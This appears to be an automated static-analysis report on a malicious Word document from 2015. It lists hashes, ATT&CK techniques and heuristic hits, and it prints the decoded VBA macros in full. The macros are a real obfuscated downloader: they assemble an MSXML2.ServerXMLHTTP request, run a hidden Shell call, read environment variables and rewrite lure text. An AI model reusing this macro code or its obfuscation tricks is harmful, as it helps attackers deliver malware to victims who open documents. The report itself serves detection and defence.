Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6e4391c618a11175…

MALICIOUS

Office (OLE)

Size: 255.5 KB
Created: 2015-08-04 11:27:00
Authoring application: Microsoft Office Word
First seen: 2015-09-18
MD5: 02eb0a2544915cb400886de58c7f8310
SHA-1: 49ccf7792db7c75e1227b445681b159efdcef6da
SHA-256: 6e4391c618a11175c7fc171c991b66e3b64387e0f048a52764a7bde7aacbcbd8
Risk Score: 190

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The sample is a malicious Word document containing VBA macros. The `OLE_VBA_SHELL` and `OLE_VBA_PCODE_AUTOEXEC_EXEC` heuristics indicate the presence of a macro that uses the `Shell` function, likely to execute a downloaded payload. The `CreateObject` call and the string `ML2.ServerXMLHTTP` suggest the macro attempts to interact with the network to fetch additional content.

Heuristics 7

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    bydd = Shell(a, 0)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Nqhdkjahsjdhjkqwhkdqwh = CreateObject(BTYQWFDYFQWTDWQAA)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Goabc = Environ(sps)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://www.iec.ch (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2342 bytes
SHA-256: f66fa68bb2929153969d22deab3a767c8fb71b7d9d53ce5343d072e8ea223527
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Hameleon()
Dim ij As Integer
Dim charCount As Integer
charCount = ActiveDocument.Characters.Count - 1
ij = 0
Do While True
    ij = ij + 1
    If (ActiveDocument.Characters(ij) = "#") Then
        If (ActiveDocument.Characters(ij - 1) = "$") Then
            ActiveDocument.Range(Start:=0, End:=ij).Delete
            ActiveDocument.Range(Start:=0, End:=charCount - ij - 1).Font.ColorIndex = wdBlack
            Exit Do
        End If
    End If
    If (ij = charCount) Then
        Exit Do
    End If
Loop
End Sub

Public Function Goabc(sps As String)
AAUQWHDQW = "178231789378291e"
Goabc = Environ(sps)
End Function

Attribute VB_Name = "Module2"
Public Function Puhlo(a As String)
Dim bydd As Variant
bydd = Shell(a, 0)
End Function

Public Function Linolium(nbqjbdjqw As String)
Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Nqhdkjahsjdhjkqwhkdqwh As Object, AHUDWQI As String
Dim ashdUHhda As String, dddc As Integer, AABDBHDDD As String, AsaHuhqdjhasd As String, AAHQJD As String
AsaHuhqdjhasd = nbqjbdjqw
ashdUHhda = AsaHuhqdjhasd
'hujdhgq
dddc = 1 - (Atn(20))
HQDUQ = hhr(Val(81 + dddc))
BHQDHJWQDW = "ML2.ServerXMLH"
BYGDWHQGWHDWQ = BHQDHJWQDW + "TT" + HQDUQ
'nasdhjkqwqd
AABDBHDDD = "E"
NBWHDWDQ = Chr(44 * 1 * 2 + 1 * 4 * dddc)
AABDBHDDD = "G" + AABDBHDDD & NBWHDWDQ
BTYQWFDYFQWTDWQAA = "MSX" + BYGDWHQGWHDWQ
'djqhdkasdkhsj
Set Nqhdkjahsjdhjkqwhkdqwh = CreateObject(BTYQWFDYFQWTDWQAA)
Nqhdkjahsjdhjkqwhkdqwh.Open AABDBHDDD, ashdUHhda
Nqhdkjahsjdhjkqwhkdqwh.Send (AHUDWQI)
AAHQJD = ThisDocument.NHdjhasbdhas(Nqhdkjahsjdhjkqwhkdqwh)
Linolium = AAHQJD
End Function

Sub Crispy(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub

Public Function Kakarumba(n As Integer)
Dim i As Integer
For i = 1 To n Step 1
    Randomize
    Kakarumba = Kakarumba + Chr(Int(121 * Rnd) + 97)
Next i
End Function
Public Function hhr(sps As Integer)
hhr = Chr(sps)
End Function